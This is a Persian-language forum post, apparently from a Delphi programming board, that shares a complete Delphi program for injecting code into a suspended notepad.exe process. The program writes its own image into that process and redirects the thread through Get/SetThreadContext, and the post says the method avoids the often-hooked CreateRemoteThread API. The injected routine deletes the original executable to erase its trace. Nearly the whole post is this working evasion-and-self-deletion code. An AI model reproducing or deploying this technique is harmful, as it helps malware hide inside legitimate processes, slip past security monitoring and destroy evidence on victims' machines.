• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت


امتیاز موضوع:
  • 9 رای - 3.44 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: Code Injection without CreateRemoteThread
حالت موضوعی
#1
This snippet uses GetThreadContext and SetThreadContext apis as a replacement for the often hooked CreateRemoteThread api. One disadvantage of this method is that the process should be suspended to safely perform the necessary process context operations.

Snippets here show you how to suspend and resume a process:

کد:
program Inj;
// by steve10120
uses
  Windows;

var
  sBuff:    array[0..255] of Char;

{$R *.res}

procedure MeltProc();
begin
  Sleep(500);
  DeleteFile(sBuff);
end;

function InjectCode(szProcessName:string; pFunction:Pointer):Boolean;
var
  STARTINFO:  TStartupInfo;
  PROCINFO:   TProcessInformation;
  pFunc:      Pointer;
  dSize:      DWORD;
  pInjected:  Pointer;
  dWritten:   DWORD;
  CONTEXT:    TContext;
  hMod:       THandle;
  IDH:        TImageDosHeader;
  INH:        TImageNtHeaders;
begin
  FillChar(STARTINFO, SizeOf(TStartupInfo), #0);
  STARTINFO.cb := SizeOf(TStartupInfo);
  if CreateProcess(nil, PChar(szProcessName),  nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, STARTINFO, PROCINFO) then
  begin
    hMod := GetModuleHandle(nil);
    CopyMemory(@IDH, Pointer(hMod), 64);
    if IDH.e_magic = IMAGE_DOS_SIGNATURE then
    begin
      CopyMemory(@INH, Pointer(hMod + IDH._lfanew), 248);
      if INH.Signature = IMAGE_NT_SIGNATURE then
      begin
        dSize := INH.OptionalHeader.SizeOfImage;
        pInjected := VirtualAllocEx(PROCINFO.hProcess, Ptr(hMod), dSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(PROCINFO.hProcess, pInjected, Ptr(hMod), dSize, dWritten);
        CONTEXT.ContextFlags := CONTEXT_FULL;
        GetThreadContext(PROCINFO.hThread, CONTEXT);
        CONTEXT.Eip := DWORD(pFunction);
        SetThreadContext(PROCINFO.hThread, CONTEXT);
        ResumeThread(PROCINFO.hThread);
      end;                
    end;
  end;
end;

procedure MeltFile();
begin
  GetModuleFileName(0, sBuff, 256);
  InjectCode('notepad.exe', @MeltProc);
end;

begin
  MeltFile;
end.
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
  


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  Source Code Eject (Remove) Devices Amin_Mansouri 0 3,297 11-13-2011، 08:22 PM
آخرین ارسال: Amin_Mansouri
  source code XN Resource Editor Amin_Mansouri 0 4,650 11-13-2011، 07:57 PM
آخرین ارسال: Amin_Mansouri
  Simple Code Virtualization (Virtual Machine / Emulator) Amin_Mansouri 0 2,931 10-18-2011، 05:18 AM
آخرین ارسال: Amin_Mansouri
  source code hook (Delphi) Amin_Mansouri 0 3,538 05-22-2011، 10:34 AM
آخرین ارسال: Amin_Mansouri
  Source Code Bitmap to mpeg Amin_Mansouri 0 3,177 04-25-2011، 12:30 PM
آخرین ارسال: Amin_Mansouri
  Source Code WinPCap Delphi Amin_Mansouri 0 4,747 04-24-2011، 01:14 PM
آخرین ارسال: Amin_Mansouri
  Delphi Source Code and Tutorials Amin_Mansouri 2 5,649 04-16-2011، 02:09 PM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


Browsing: 2 مهمان